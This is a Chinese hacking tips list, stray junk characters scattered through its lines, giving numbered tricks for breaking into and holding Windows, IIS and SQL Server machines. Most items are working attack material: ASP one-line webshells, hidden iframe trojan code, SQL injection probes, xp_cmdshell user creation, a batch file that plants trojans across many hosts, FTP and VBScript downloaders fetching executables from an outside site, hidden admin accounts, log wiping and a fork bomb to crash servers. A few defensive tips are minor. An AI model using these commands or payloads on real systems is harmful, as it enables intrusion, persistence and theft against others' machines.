1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,. R( `5 d* m; x1 f+ A
cacls C:\windows\system32 /G hqw20:R
7 G* T( \* J* \5 v; N思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入 A' e3 ?9 D, N h! d3 A
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
8 L/ a" A! i3 o9 m$ n' d9 C2 Y6 Q4 a6 P$ b& C; @/ ]! S
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。9 c- f0 R u2 j/ o( q/ ]$ L( `* b
+ @1 M/ k B; P+ z9 b2 | N3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
& B& P5 Y, g2 Y Z3 k% y" Y
s- _( L: d3 }! f4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
! r$ B |: v% D7 h: z0 \8 y* g; A* g# g2 q7 |7 _# i' L
5、利用INF文件来修改注册表" ^2 O% m5 e0 u c0 |
[Version]! n8 Z4 i3 w1 Q2 b4 I+ D$ {
Signature="$CHICAGO$"
7 @) d0 l' H8 N! b+ K( e[Defaultinstall]
* L# ~0 B" d4 k* M, |4 ~$ m5 r( EaddREG=Ating
9 R* o# P# s8 p- ~& u[Ating]
1 A- Z& T4 f! e) R3 b, ZHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"7 u' N- I2 z# f- w
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:% L7 G! E$ H5 C$ ~0 z# @
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径) Q7 U9 V5 L( f# [# ]
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
+ X+ a% P3 t" xHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 c3 k' C8 Q \* R. n
HKEY_CURRENT_CONFIG 简写为 HKCC0 `0 @- O/ @2 a1 y9 K( G
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; v2 R: Q4 _6 ^, G. _
"1"这里代表是写入或删除注册表键值中的具体数据- Z# k3 h6 x8 o: G
1 M6 n" O) m% R7 g
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,% w% T( b) ~* [' o- f- E
多了一步就是在防火墙里添加个端口,然后导出其键值5 @5 U) T+ A& ~" Y' ^) t
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! E, q; G& {5 Z0 i7 f
7 D4 U* R2 O$ P$ b; |3 z2 U: m7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
4 r$ y& U+ {) n! @! t7 o5 ~在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
. J" c% x0 ], V9 j' x6 u2 n
0 e% o% m$ s* s6 o- c% ]8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。5 I- s2 O: i( j/ O) p4 i4 A* V0 o& g
# ]& X: [6 B8 ~/ L* d( |
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,* W5 |, e5 f' `1 z. k
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
) b5 R7 q. s% N; [0 H, C5 e1 ]% Q1 { Q# \5 [
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- W9 B$ |2 a0 t5 o0 b% Z
: J$ F" h, q& X- Y11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 F7 ^% _9 w: c用法:xsniff –pass –hide –log pass.txt' l+ }5 u' \0 i3 p- y, S# i# g$ |
0 d9 a/ _' @% W# U% C5 V1 c, U
12、google搜索的艺术
6 E4 c. }, o* s搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
! r) m) D, k9 d& R- ~ {2 p或“字符串的语法错误”可以找到很多sql注入漏洞。- C& D! p7 W5 A
T' Q: }. V# U+ C13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
) \$ n4 H* v7 Z, P& Q9 ^7 l$ B$ x! m4 F5 k7 H7 ?
14、cmd中输入 nc –vv –l –p 1987% S- e ~$ h3 H9 p! j; q0 g7 L
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
" p" [9 r( f% U' {4 \8 l- G1 y! \# E& `8 r: r9 Z. m
15、制作T++木马,先写个ating.hta文件,内容为
7 |8 L9 v& \/ y1 P- f( k4 d<script language="VBScript">
7 z( r" M- Z% v( F# Aset wshshell=createobject ("wscript.shell" )
$ e$ x0 N6 I6 J$ z8 Da=wshshell.run("你马的名称",1)
0 J. Y; H& h! H4 n! ewindow.close( W) O: A1 [" [( D3 O" r4 w% \ }+ A
</script>$ k1 Z* [' y9 E) E+ K
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
5 B6 ~% ^* Y8 G
$ O" m8 P7 n6 y' x$ H+ ?16、搜索栏里输入! C( s' q% Y! [" X5 `
关键字%'and 1=1 and '%'='
/ x1 x/ T: r7 R- X9 w, m" a3 |关键字%'and 1=2 and '%'='$ E' w9 E$ x ~
比较不同处 可以作为注入的特征字符
3 T, h8 Z2 D+ X I
7 q! n M3 i! ]) } _8 c6 f17、挂马代码<html>$ s. N% @: A- V1 e3 e
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
$ ` Q9 _! l/ r</html>
: j4 E& \' Q6 f0 [( [) o6 [' v5 j' s7 D6 H
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
1 ]4 O: Z) t5 l9 J; E4 l5 s, Qnet localgroup administrators还是可以看出Guest是管理员来。6 X `' E! Z& \: G, A. ^0 x
+ ~3 o1 }/ P1 d19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
0 ]: B$ g" {* w; {1 Z用法: 安装: instsrv.exe 服务名称 路径
. V( A9 C4 N& V- V5 f1 A: s% x6 n, f卸载: instsrv.exe 服务名称 REMOVE8 P/ \2 ~* ~8 ^
) h3 Y$ b2 V+ Q5 U! V. S( H& P
) G* `1 o) k, Q( a& e
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉1 B T. _8 z- }, J% O% ]* O6 ~: S
不能注入时要第一时间想到%5c暴库。
6 W1 z" @* z7 j. o0 z0 i; w" h, j/ z# L
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. F$ v$ Z! p9 P! j8 U+ g3 u; ]; G5 ^- v' F* q. Y7 k" t
23、缺少xp_cmdshell时0 N) t4 \$ {* l: l9 P3 w# U6 v! V
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'! x( ~1 L! ^$ a+ H4 M& Q
假如恢复不成功,可以尝试直接加用户(针对开3389的)
6 P& v1 n$ J8 w; ]: i3 C. }declare @o int! a+ n8 _& ^5 ^! g j4 q, a @. Z6 p
exec sp_oacreate 'wscript.shell',@o out3 ^. U7 U# K4 ]: v
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
1 E6 U) l% A7 J5 Z& ]% N
# f! e4 b+ i6 O24.批量种植木马.bat* R3 d% z& q5 a
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 q; Y) u: V% i) hfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间4 B' B: l, c, E- x
扫描地址.txt里每个主机名一行 用\\开头
6 t% P: q! O. n! X& P3 X1 D k+ U% x, L9 ^6 m8 l# c/ T7 ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
$ x* S& {6 k) u. u+ i: P2 X+ W1 G% {7 w9 p+ O: C
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.1 V2 L4 R* ]6 J$ b1 R
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下., @# B, v# }4 Y/ J" W' ?
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
$ T. `4 H9 s7 r( a4 L
) h5 P Q. C% ~27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP6 g, _* R, H9 h1 l: D
然后用#clear logg和#clear line vty *删除日志) S9 t' Q0 X: r. a7 Y: \3 ?
3 }; A$ C E* M2 e- v1 j
28、电脑坏了省去重新安装系统的方法" r: V3 I9 U2 M* c# B% j# W- D5 S6 y
纯dos下执行,! W% k+ C, A: F! m6 L! z5 W( s0 Y
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
! Z1 t- y& Z7 K9 E" n2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
4 d9 _9 i; ~' [6 G. ^% _% \
2 I% d! j; i$ f5 \, s29、解决TCP/IP筛选 在注册表里有三处,分别是:0 ]0 [2 f& |% N$ r% n3 b
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
, Y) W. E4 B" Z3 }1 W+ w. B4 THKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ P# k) }; D {& \: jHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( I: a9 E! b5 i" \5 a分别用
4 c! V5 i2 A1 ]% K% f4 m2 Oregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ \6 f6 P- M7 i; v# E0 j
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( k+ S2 s6 P! f" K) p7 _9 i. ^0 Gregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 K8 x; d0 y N
命令来导出注册表项& M: r0 r8 F6 W6 B
然后把三个文件里的EnableSecurityFilters"=dword:00000001,) q/ n, S+ \1 e
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
W) c, d8 D1 j5 E4 m( L8 Iregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
# L/ `3 Q. l7 J" q2 F
! l# D; M7 V, p- i' T30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- h9 W1 `$ _5 U; c; x6 G N
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
' a, B& b6 l) [+ N! m& y4 f; A9 @: @# s$ Y3 V
31、全手工打造开3389工具( [% x3 b. S( o) V& ]
打开记事本,编辑内容如下:1 g5 F1 W7 E8 m1 b& `2 _9 m8 N9 M
echo [Components] > c:\sql
& P) i( e- ~& `echo TSEnable = on >> c:\sql# `2 ], G/ `2 N( a: b& M' K- O1 S7 C- k
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
p5 p. g! }6 j3 Z+ h" R2 n编辑好后存为BAT文件,上传至肉鸡,执行' B, m: U8 r) C7 z4 V3 F
2 Q( I: |5 G8 j
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
; j/ J% |, b3 q* y
( \% G! e# ~) l" f33、让服务器重启
: M/ F0 u0 N" ~9 d: o写个bat死循环:
) O: I* I8 N$ [; [7 l# d; O0 r@echo off
# `2 R4 u k. c) G5 A:loop13 T' e/ G% V* z8 L
cls: L9 {( s+ [4 Z% Z. z7 w: L
start cmd.exe: m+ M; g' `7 N* e8 h- m- |
goto loop1
2 K/ W% d" g5 }; {% g/ R5 _保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
. k$ I% Q! x2 m+ I; q9 m% C. y H
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
, Q* T: d' d2 V@echo off) ^6 p f' ^, H9 b. g
date /t >c:/3389.txt
2 g4 |$ E% Y" p$ etime /t >>c:/3389.txt
" s. d: s5 N% j+ u& S0 u3 Jattrib +s +h c:/3389.bat: N6 [4 ~ E7 p F
attrib +s +h c:/3389.txt+ c$ ^- b- x: _2 x' G! u* |
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
: O# V5 F9 b: P) o y并保存为3389.bat
9 ]- l1 l7 U# t, Z打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号- i7 m- b9 U1 E- e$ U3 B' ?" B j
6 e! l2 g# T& q2 O& }; ?, q) \0 M35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* D' J$ H+ L: T9 G/ Tstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
& {1 V4 s9 y4 x4 d2 ?输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
5 e5 r, k2 Y% c' q! e8 C' V' A8 C8 O5 d: C% Q
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
! r |- J; G H X. ]3 Eecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址2 m2 L: Y6 I0 F: u; }! w' I: G& ]
echo 你的FTP账号 >>c:\1.bat //输入账号
, n; G: v9 V0 k2 s/ aecho 你的FTP密码 >>c:\1.bat //输入密码5 A$ k2 \/ x/ O2 s, q4 D( G
echo bin >>c:\1.bat //登入& O# n7 z- U7 W' X5 L5 q1 m, \
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么/ M0 \3 w" a8 W9 O3 j
echo bye >>c:\1.bat //退出* E7 K- I- J' J8 X
然后执行ftp -s:c:\1.bat即可5 w" y5 s1 F1 e. W& `4 q# h
2 F% k- X3 f* M+ h4 ^1 Z
37、修改注册表开3389两法5 E) p' Y3 ^- C+ v: |+ \
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
; s) X1 R* ~3 Y$ decho Windows Registry Editor Version 5.00 >>3389.reg2 ~# h8 z% H9 g
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
4 M: {3 ^ q V5 z, r- yecho "Enabled"="0" >>3389.reg6 p9 W, n8 Q1 g2 ]) f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
; ^. {) I1 E9 ?, P% ANT\CurrentVersion\Winlogon] >>3389.reg
, `5 n+ p* j! U7 iecho "ShutdownWithoutLogon"="0" >>3389.reg
6 }$ _% K0 _) g, v" R" t1 zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]; v9 ~& A8 a& j& t# k5 g! U
>>3389.reg) |/ q u7 Z$ J8 S# Y. {
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
7 n2 Y: G5 h P3 u- m5 a3 Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]/ i6 g# g4 _: n5 m3 x
>>3389.reg
0 A1 A% w' ^: G+ t, A; v2 b S4 wecho "TSEnabled"=dword:00000001 >>3389.reg
7 p9 J6 i/ h4 z: Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
- p; p4 J) H3 B; a O( s/ Y) m; z. uecho "Start"=dword:00000002 >>3389.reg! X, w+ }9 t% b9 r% c: @& ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]9 V, p$ H9 C% M: s- I, G2 O
>>3389.reg
9 @5 W9 @2 h2 Y$ lecho "Start"=dword:00000002 >>3389.reg
+ G* p9 \6 }/ {2 Q6 b [echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 G/ d, D6 w$ _
echo "Hotkey"="1" >>3389.reg
0 e" W6 I3 `: `, _: c5 a0 g; x, }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ L7 b- ?1 T# K( @
Server\Wds\rdpwd\Tds\tcp] >>3389.reg$ Q6 X, F! U0 T" D6 V0 ]8 @
echo "PortNumber"=dword:00000D3D >>3389.reg
3 B/ X( L& [; Z! `& fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: A( \. q& c4 r8 P9 O+ J' m* v
Server\WinStations\RDP-Tcp] >>3389.reg
7 k& w9 K2 b5 h' \" g: Secho "PortNumber"=dword:00000D3D >>3389.reg7 [) D' M5 j1 H0 h& x' N' t
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
H& c. G# [' }: i% h+ J- `2 M(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)% [. A' ~. G: n( t+ S* x
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 V& M; J2 B) P5 H- R
(2)winxp和win2003终端开启
& M' h2 d$ r" E9 O! Y+ k1 o用以下ECHO代码写一个REG文件:
1 u7 ]5 E6 ^) @ E8 {echo Windows Registry Editor Version 5.00>>3389.reg8 p# c6 L1 n# v' h1 G6 o, R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
e/ J1 u P0 Z: dServer]>>3389.reg; Z8 { E p+ r
echo "fDenyTSConnections"=dword:00000000>>3389.reg1 n8 {3 @5 g4 f. e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* j+ }2 G- w3 L+ n4 hServer\Wds\rdpwd\Tds\tcp]>>3389.reg( w4 ^( N) R8 j* G/ V
echo "PortNumber"=dword:00000d3d>>3389.reg% u/ Q9 }3 j; ]- [5 L, @" p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 u9 S( ]0 K: yServer\WinStations\RDP-Tcp]>>3389.reg/ _2 @/ d: x( M( j
echo "PortNumber"=dword:00000d3d>>3389.reg$ W* `# o2 I9 i$ `# v, A. T6 b
然后regedit /s 3389.reg del 3389.reg
6 y% e; L' q5 n3 iXP下不论开终端还是改终端端口都不需重启
! B, m. c/ {. x# ]; H+ i G4 W; z9 e9 p6 ~/ U" d7 l b3 w! i5 ]8 Z
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
- n0 o& E& ^+ L- {. y" @用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
; M( W" ?4 r1 d. E7 F# ]; r# ]6 `2 G6 t* N! [$ u) r
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!0 H2 _% D1 o& i' p, r# o' k
(1)数据库文件名应复杂并要有特殊字符( z* g! o+ s# f, k* T4 p
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源" R- t, y& i7 T, {% x4 b
将conn.asp文档中的
8 w, j3 `! N' s! B- g1 z$ ?4 g2 ZDBPath = Server.MapPath("数据库.mdb"); C, C8 U4 O0 w, k
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
; x0 c8 m8 L8 S2 c" _* _ u0 a$ G1 U/ ?$ B! I( x" p
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
. [9 {! H" Y T(3)不放在WEB目录里
4 f H, ?" R. ]1 V
8 I w; ^; z. A5 h: \/ w40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
6 j5 g) q% d4 o, A0 r可以写两个bat文件
# t2 f4 D6 F% x; b+ |9 a! n@echo off8 ]; [) X; Y; \- [ m
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe/ I7 I, }. O, A0 A
@del c:\winnt\system32\query.exe
; p; t; i2 z* v, `* A+ ?6 A@del %SYSTEMROOT%\system32\dllcache\query.exe8 g! Y9 Y% S6 b+ U
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的2 ~: X% \* B7 H+ H& @. A {7 O' k
1 _5 m& Y9 a: D3 Y* j@echo off6 e7 F# Q$ R1 M/ H& ~: F/ w! ~: g
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
' R W4 x1 o+ n- h5 i: }2 [3 H@del c:\winnt\system32\tsadmin.exe
# N' ^& L4 [2 Z" h@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex. V6 e4 F9 g) B' s ]! l% ~7 x
% c8 C: i6 Q' m41、映射对方盘符
) _2 g2 `3 Z, I$ z% L1 stelnet到他的机器上,
8 `6 n6 o) D/ pnet share 查看有没有默认共享 如果没有,那么就接着运行
" A" ^% T$ B# ?0 o3 ] A- f: P1 hnet share c$=c:" \5 A: |# Z, d- R1 W3 `! s5 {
net share现在有c$
/ l6 \6 X+ W4 ~ g) _' Y& R在自己的机器上运行) D1 k- U0 U" m" Y2 i( W( r% p$ g
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K+ o0 }' } F' _/ O! M2 N7 z* s
$ T* I8 L4 h [7 d
42、一些很有用的老知识6 ~: Y# b) [, n2 x2 G
type c:\boot.ini ( 查看系统版本 )
: q+ T( O# U5 S! ~* k6 y |net start (查看已经启动的服务)
& P2 c! s$ q. z0 L( E6 s. Q/ }; Xquery user ( 查看当前终端连接 )
. {# i$ A7 t: @- fnet user ( 查看当前用户 )# S. S6 W1 a8 J# _, i
net user 用户 密码/add ( 建立账号 ): L* v" u: H* i- ` `. ]5 E
net localgroup administrators 用户 /add (提升某用户为管理员)
; K# U0 X! B- [1 ]) }$ n- H: fipconfig -all ( 查看IP什么的 )1 Y$ `4 }- }9 _3 H6 `
netstat -an ( 查看当前网络状态 )
$ H8 C% ^5 l2 ~' v2 V" Vfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) O/ a- a- q8 M+ F7 w1 ?克隆时Administrator对应1F41 K1 Y3 e/ i4 U0 S4 E( w% D
guest对应1F53 _1 n; x* N- Y8 ]+ }6 R
tsinternetuser对应3E85 ?, A/ ~6 I3 _( Y5 k3 y
' F7 \& x8 G2 a7 P8 m7 N( j: [
43、如果对方没开3389,但是装了Remote Administrator Service5 u* m2 p5 A e0 R& d8 [
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
" Q- \: f! @- W解释:用serv-u漏洞导入自己配制好的radmin的注册表信息9 b0 A! n! L2 j8 A% W1 g" e
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" `2 C1 a+ a! F+ t! U4 _5 z ?
. A8 z: q/ y/ k: g' j1 N
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
% o8 B- L7 J5 {& c3 h" i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ P6 C8 V! f1 o8 n) Y* y3 [9 Y$ @6 \
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
* o g; Q3 N. k: y2 t6 h# ~' secho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
6 H. X) _5 Y, W) `! f7 P1 R( D^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
) o+ A& i5 D4 d& qCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
+ N1 z/ i- G. ~/ Q6 n1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs/ f: z0 u. \! L1 W7 _
(这是完整的一句话,其中没有换行符)7 X/ \* ^3 G5 O) w' D. d
然后下载:+ a, }: ^; M e# d! E* \
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
7 h/ \9 O5 k3 _# G
+ P# o5 r2 R7 h" B, ?46、一句话木马成功依赖于两个条件: \& ^: l2 e* e$ L
1、服务端没有禁止adodb.Stream或FSO组件
$ X. m+ P! C7 I2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 a8 X- d$ y6 Q1 Z0 @% ]& p! k+ b3 d+ I6 o0 A9 O
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. B. K1 T2 o+ c0 o. s;alter database utsz set RECOVERY FULL--
/ g0 V! s; [# N i, c;create table cmd (a image)--. p- z5 T5 b4 Z; |
;backup log utsz to disk = 'D:\cmd' with init--
- U9 U. K' o" k! X, }- D& W. A;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--0 i" c; T e3 N5 D7 W- L5 z0 \ {
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
2 G8 G% {6 H( Q6 _( }* N: q/ Q注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。3 k$ g/ t. ? C' }2 M
; U; C! U. n4 d, E6 w
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:6 f+ ~# U9 ~8 a" h, \/ i
/ B4 S" T/ X6 }5 R
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
8 q! e% j7 x* z所有会话用 'all'。
; I/ @/ L2 i+ f$ R M: M-s sessionid 列出会话的信息。
) y0 d% @! i6 Q-k sessionid 终止会话。. {, `) {- |# x# B0 d$ U
-m sessionid 发送消息到会话。
* U% H: h, R! c
7 I8 r1 ^# w/ |) sconfig 配置 telnet 服务器参数。
$ f4 k- ?0 O: u" K
( x) F) R2 F: U6 ccommon_options 为:
; a' z+ X& B+ I. C$ W" x# \- p, A-u user 指定要使用其凭据的用户
5 j1 f3 W# @1 }: ?-p password 用户密码- p: o X! _ G6 l5 u
) l, D/ s/ y- G. ]3 `. Wconfig_options 为:8 t3 C0 i, o; a; Y3 M# f
dom = domain 设定用户的默认域
) y4 X4 J8 T5 o8 G- ictrlakeymap = yes|no 设定 ALT 键的映射$ I+ `- A$ v) Z, l" T
timeout = hh:mm:ss 设定空闲会话超时值
# z6 l, i& b$ j- }! Ztimeoutactive = yes|no 启用空闲会话。! I' ]% R6 D' Y( z- D8 [
maxfail = attempts 设定断开前失败的登录企图数。/ @' q+ \+ F/ O; L# j) c
maxconn = connections 设定最大连接数。
: y7 l4 Y5 e6 m' @" k0 Z+ cport = number 设定 telnet 端口。
) d: v) [2 m6 ~sec = [+/-]NTLM [+/-]passwd
+ M9 T( T) i, I) l( x4 G: S设定身份验证机构" ^1 \0 A @3 T6 y6 X9 w( L% [
fname = file 指定审计文件名。
* F1 F. m% ]6 N+ nfsize = size 指定审计文件的最大尺寸(MB)。7 Y" R* F. x* F! V" {7 s
mode = console|stream 指定操作模式。/ {: r% Y" h* o% A( o6 e
auditlocation = eventlog|file|both
( q6 \) Z& f: i' H指定记录地点1 [3 T+ B P8 g, ~5 K* r
audit = [+/-]user [+/-]fail [+/-]admin
l4 J, C; X* L) Y6 B" \" d' n1 d* o
49、例如:在IE上访问:
2 W0 u+ \+ n( fwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
2 H# r- t N+ _, Vhack.txt里面的代码是:
; B" |: Q( c! L' V# W3 Y* \, Z<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">; G/ B' j N9 z" r. x, j
把这个hack.txt发到你空间就可以了!
" v' \; w F" O+ b! Z$ S: M这个可以利用来做网马哦!
1 F" Z$ F" G/ \! [; r9 c0 j% \( B3 |+ U& {; j7 z
50、autorun的病毒可以通过手动限制!( Y" ]% j/ M X9 V
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!0 q2 {* _5 h( W& ?. T
2,打开盘符用右键打开!切忌双击盘符~9 s1 { |' c* a+ X
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
+ ?2 `# w! {* d
. |# P- b S& ~9 ]51、log备份时的一句话木马:
6 k" g1 v7 x) `' |a).<%%25Execute(request("go"))%%25>
' e& ? g& l6 ^b).<%Execute(request("go"))%>' z7 {: d1 a9 |( g
c).%><%execute request("go")%><%
4 w/ s- E4 {+ j8 E% Ed).<script language=VBScript runat=server>execute request("sb")</Script>, G( B" E0 z& |- Y5 T6 k, z Y' d' A* I
e).<%25Execute(request("l"))%25>
0 m! P8 Y: l" }, j& ~9 {f).<%if request("cmd")<>"" then execute request("pass")%>
6 l) k( C! m# Y' @1 } \
" q# s2 B! T3 L! G52、at "12:17" /interactive cmd9 ] t; b p; b% N
执行后可以用AT命令查看新加的任务2 o# Q% O8 T8 c1 p
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
